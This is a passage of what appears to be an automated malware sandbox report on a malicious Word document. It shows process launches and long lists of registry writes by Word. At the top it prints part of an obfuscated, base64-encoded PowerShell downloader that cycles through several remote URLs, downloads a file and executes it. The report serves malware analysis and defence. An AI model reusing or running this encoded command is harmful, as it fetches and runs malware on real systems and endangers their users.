CcAaQB0AGUAPQBQAE8AMwAnACsAJwAyAG4AJwArACcAWgB
TACcAKQArACgAJwBOAFEAPQBQACcAKwAnAE8AJwArACcAM
wAnACkAKwAnADIAQAAnACsAKAAnAGgAJwArACcAdAB0ACcA
KwAnAHAAOgA9AFAAJwApACsAJwBPACcAKwAoACcAMwAyA
D0AJwArACcAUABPADMAMgB3AHcAdwAnACsAJwAuACcAKwA
nAHIAJwArACcAaQAnACkAKwAoACcAbQBpACcAKwAnAG4Adg
BlAHMAJwApACsAJwB0ACcAKwAoACcALgAnACsAJwB2AG4A
PQBQAE8AMwAyAGkAJwArACcAbgAnACkAKwAnAHMAJwArAC
cAdAAnACsAJwBhACcAKwAnAGwAbAAnACsAKAAnAD0AUAAn
ACsAJwBPADMAMgBaAHgAaAA9AFAATwAnACsAJwAzADIAJw
ArACcAQAAnACkAKwAoACcAaAAnACsAJwB0AHQAcAAnACkAK
wAnADoAJwArACcAPQAnACsAKAAnAFAAJwArACcATwAzADIA
PQAnACkAKwAnAFAAJwArACcATwAnACsAKAAnADMAMgB3AH
cAJwArACcAdwAnACsAJwAuADEAYwAnACkAKwAnAGEALgAnA
CsAJwBjACcAKwAnAG8AJwArACcALgAnACsAJwB6ACcAKwAn
AGEAJwArACgAJwA9AFAATwAnACsAJwAzACcAKQArACgAJwA
yACcAKwAnADEAYwBBACcAKQArACcAZAAnACsAKAAnAG0AaQ
BuAD0AUAAnACsAJwBPACcAKQArACcAMwAyACcAKwAnAGIAP
QAnACsAKAAnAFAATwAzACcAKwAnADIAJwApACsAKAAnAEAA
aAB0AHQAJwArACcAcAAnACkAKwAoACcAOgAnACsAJwA9AFA
ATwAzACcAKQArACgAJwAyAD0AUABPACcAKwAnADMAJwApA
CsAJwAyAHAAJwArACcAYQAnACsAKAAnAHUAbAAnACsAJwBz
AGMAbwAnACkAKwAnAG0AcAAnACsAJwB1ACcAKwAoACcAdA
BpAG4AJwArACcAZwAuAGMAbwAnACkAKwAoACcAbQAnACsA
JwA9AFAATwAzADIAJwApACsAKAAnAEMAJwArACcAcgBhAGk
AZwAnACkAKwAnAHMATQAnACsAJwBhAGcAJwArACcAaQAnA
CsAJwBjAFMAJwArACcAcQAnACsAJwB1AGEAJwArACgAJwBy
ACcAKwAnAGUAPQBQAE8AMwAnACkAKwAoACcAMgBmACcAK
wAnAD0AUAAnACkAKwAoACcATwAzADIAQABoACcAKwAnAHQ
AJwApACsAJwB0ACcAKwAnAHAAJwArACgAJwA6AD0AJwArA
CcAUABPACcAKwAnADMAMgAnACkAKwAnAD0AJwArACgAJwB
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 7/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
QAE8AJwArACcAMwAnACkAKwAoACcAMgB3ACcAKwAnAGkAJ
wApACsAKAAnAGsAaQAnACsAJwBiAHIAaQAnACkAKwAnAGMA
bwAnACsAKAAnAGwAJwArACcAYQBnAGUALgBjAG8AbQAnACs
AJwA9ACcAKwAnAFAAJwArACcATwAzADIAdwBwACcAKwAnAC
0AJwArACcAYQBkAG0AaQAnACkAKwAoACcAbgA9AFAAJwArA
CcATwAnACkAKwAoACcAMwAyAFgAaQAnACsAJwBaACcAKQAr
ACgAJwByAGIAJwArACcAeQA9AFAAJwApACsAJwBPACcAKwA
nADMAMgAnACkALgAiAFIAYABFAFAATABBAGAAYwBFACIAKAA
oACgAJwA9AFAATwAnACsAJwAzACcAKQArACcAMgAnACkALA
AnAC8AJwApAC4AIgBTAFAAbABgAEkAdAAiACgAJABCAGgAeQ
BiAGQAZQBmACAAKwAgACQAWQAzADgAMABvADEAZgAgACs
AIAAkAEEAXwBiAGYAaABrAGgAKQA7ACQAUQA1ADIAbAA5AGo
ANwA9ACgAJwBVADUAJwArACgAJwBmACcAKwAnAGIAMwAn
ACkAKwAnAHQAdgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKA
AkAFcAeAB5AG4AagAxADkAIABpAG4AIAAkAEcAXwBhAHcAaA
BpADkAKQB7AHQAcgB5AHsAJABTAGwAbAA4AG8AawB1AC4AI
gBkAGAAbwBXAG4ATABvAEEARABmAGAAaQBsAGUAIgAoACQ
AVwB4AHkAbgBqADEAOQAsACAAJABTAGcAdwBxADcANwA5A
CkAOwAkAEMAMQA0AHQAbABfAGIAPQAoACcATAAnACsAKAA
nAG0AOAAnACsAJwA5AHMAdgBkACcAKQApADsASQBmACAA
KAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACc
AbQAnACkAIAAkAFMAZwB3AHEANwA3ADkAKQAuACIAbABFAG
AATgBHAGAAVABoACIAIAAtAGcAZQAgADQANAA2ADgANgApA
CAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwAr
ACgAJwBpAG4AMwAyACcAKwAnAF8AUAAnACkAKwAoACcAcg
BvAGMAZQAnACsAJwBzAHMAJwApACkAKQAuACIAYwBgAFIA
YABlAGEAVABFACIAKAAkAFMAZwB3AHEANwA3ADkAKQA7ACQ
ARwBjAGEAMwBiAGYANQA9ACgAJwBQACcAKwAoACcAagBrAD
AAZQAnACsAJwBjAHQAJwApACkAOwBiAHIAZQBhAGsAOwAkA
EMAYgByAHMAeQBzAHgAPQAoACcAUAAnACsAKAAnADYAJwA
rACcAdwBtADkAdQBoACcAKQApAH0AfQBjAGEAdABjAGgAewB9
AH0AJABLAG0AdABxAHUAZwBjAD0AKAAoACcAWgBoAHoAJw
ArACcAMQAnACkAKwAoACcAMwBnACcAKwAnAG0AJwApACkA
Information
User: admin Company: Microsoft Corporation
Integrity Level: MEDIUM Description: Windows PowerShell
Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1640 C:\Users\admin\Jehhzda\Ben14fr\G_jugk.exe C:\Users\admin\Jehhzda\Ben14fr\G_jugk.exe wmiprvse.exe
Information
User: admin Integrity Level: MEDIUM
Description: EffectDemo MFC Application Exit code: 0
Version: 1, 0, 0, 1
3164 "C:\Users\admin\AppData\Local\photowiz\regidle.exe" C:\Users\admin\AppData\Local\photowiz\regidle.exe G_jugk.exe
Information
User: admin Integrity Level: MEDIUM
Description: EffectDemo MFC Application Version: 1, 0, 0, 1
Registry activity
Total events Read events Write events Delete events
5 580 4 614 779 187
Modification events
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: ,x3
Value: 2C783300A80A0000010000000000000000000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1033
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1041
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1046
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1036
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1031
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1040
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 8/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1049
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 3082
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1042
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1055
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1033
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1046
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1036
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1031
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1040
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1041
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1049
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 3082
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1042
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1055
Value: On
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write Name: WORDFiles
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write Name: ProductFiles
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109F10021400000000000F01FEC\Usage
Operation: write Name: StemmerFiles_1042
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation: write Name: MTTT
Value: A80A0000E15B7C49DB8AD70100000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: &y3
Value: 26793300A80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0
052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 9/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
006D00000000000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: &y3
Value: 26793300A80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0
052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074
006D00000000000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: 2y3
Value: 32793300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: 2y3
Value: 32793300A80A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0
066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094
CD00AC200030AEA5B20000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write Name: ProxyBypass
Value: 1
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write Name: IntranetName
Value: 1
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write Name: UNCAsIntranet
Value: 1
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write Name: AutoDetect
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: <z3
Value: 3C7A3300A80A000006000000010000008800000002000000780000000400000063003A005C00750073006500720073005C00610064006D0069006E005C00610070007000640061007400610
05C006C006F00630061006C005C00740065006D0070005C0063006D006F002D0031003000300031003200300020006300640077002D003100300032003200320030002E0064006F00630000
0000000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-
18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write Name: VBAFiles
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Operation: delete value Name: Max Display
Value: 25
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Operation: write Name: Max Display
Value: 25
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Operation: delete value Name: Item 1
Value: [F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Operation: write Name: Item 1
Value: [F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Operation: delete value Name: Item 2
Value: [F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Operation: write Name: Item 2
Value: [F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Max Display
Value: 25
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Max Display
Value: 25
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 1
Value: [F00000000][T01D655C737260480][O00000000]*C:\Users\admin\Desktop\earthphoto.rtf
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 10/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 1
Value: [F00000000][T01D655C737260480][O00000000]*C:\Users\admin\Desktop\earthphoto.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 2
Value: [F00000000][T01D4A71D9B2F9D00][O00000000]*C:\Users\admin\Desktop\seaoverview.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 2
Value: [F00000000][T01D4A71D9B2F9D00][O00000000]*C:\Users\admin\Desktop\seaoverview.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 3
Value: [F00000000][T01D460307721EE80][O00000000]*C:\Users\admin\Desktop\educationget.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 3
Value: [F00000000][T01D460307721EE80][O00000000]*C:\Users\admin\Desktop\educationget.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 4
Value: [F00000000][T01D6B2F771F5B200][O00000000]*C:\Users\admin\Desktop\paulcell.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 4
Value: [F00000000][T01D6B2F771F5B200][O00000000]*C:\Users\admin\Desktop\paulcell.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 5
Value: [F00000000][T01D280E52F543C00][O00000000]*C:\Users\admin\Documents\nameflowers.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 5
Value: [F00000000][T01D280E52F543C00][O00000000]*C:\Users\admin\Documents\nameflowers.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 6
Value: [F00000000][T01D734197EDFB180][O00000000]*C:\Users\admin\Documents\namefew.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 6
Value: [F00000000][T01D734197EDFB180][O00000000]*C:\Users\admin\Documents\namefew.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 7
Value: [F00000000][T01D3BC45C6AB8800][O00000000]*C:\Users\admin\Documents\citydocumentation.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 7
Value: [F00000000][T01D3BC45C6AB8800][O00000000]*C:\Users\admin\Documents\citydocumentation.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: delete value Name: Item 8
Value: [F00000000][T01D60EFBFE383900][O00000000]*C:\Users\admin\Documents\cleansystem.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Operation: write Name: Item 8
Value: [F00000000][T01D60EFBFE383900][O00000000]*C:\Users\admin\Documents\cleansystem.rtf
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2B4759
Operation: write Name: 2B4759
Value: 04000000A80A00003B00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0
070005C0043004D004F002D0031003000300031003200300020004300440057002D003100300032003200320030002E0064006F0063001900000043004D004F002D003100300030003100320
0300020004300440057002D003100300032003200320030002E0064006F006300000000000100000000000000D3347549DB8AD70159472B0059472B0000000000DB04000000000000000000
0000000000000000000000000000000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000FFFFFFFF
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value Name: <z3
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 11/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 3C7A3300A80A000006000000010000008800000002000000780000000400000063003A005C00750073006500720073005C00610064006D0069006E005C00610070007000640061007400610
05C006C006F00630061006C005C00740065006D0070005C0063006D006F002D0031003000300031003200300020006300640077002D003100300032003200320030002E0064006F00630000
0000000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\TypeLib\{CDC55372-DA1A-496A-8635-CBDAEBCE6B26}\2.0
Operation: write Name: (default)
Value: Microsoft Forms 2.0 Object Library
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\TypeLib\{CDC55372-DA1A-496A-8635-CBDAEBCE6B26}\2.0\FLAGS
Operation: write Name: (default)
Value: 6
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\TypeLib\{CDC55372-DA1A-496A-8635-CBDAEBCE6B26}\2.0\0\win32
Operation: write Name: (default)
Value: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\TypeLib\{CDC55372-DA1A-496A-8635-CBDAEBCE6B26}\2.0\HELPDIR
Operation: write Name: (default)
Value: C:\Users\admin\AppData\Local\Temp\VBE
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Operation: write Name: (default)
Value: Font
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
Operation: write Name: (default)
Value: IDataAutoWrapper
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
Operation: write Name: (default)
Value: IReturnInteger
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
Operation: write Name: (default)
Value: IReturnBoolean
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
Operation: write Name: (default)
Value: IReturnString
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
Operation: write Name: (default)
Value: IReturnSingle
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
Operation: write Name: (default)
Value: IReturnEffect
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: IControl
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: Controls
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
Operation: write Name: (default)
Value: IOptionFrame
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: _UserForm
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
Operation: write Name: (default)
Value: ControlEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
Operation: write Name: (default)
Value: FormEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
Operation: write Name: (default)
Value: OptionFrameEvents
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: ILabelControl
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 12/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: ICommandButton
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: IMdcText
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: IMdcList
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: IMdcCombo
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: IMdcCheckBox
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: IMdcOptionButton
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
Operation: write Name: (default)
Value: IMdcToggleButton
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
Operation: write Name: (default)
Value: IScrollbar
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Operation: write Name: (default)
Value: Tab
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Operation: write Name: (default)
Value: Tabs
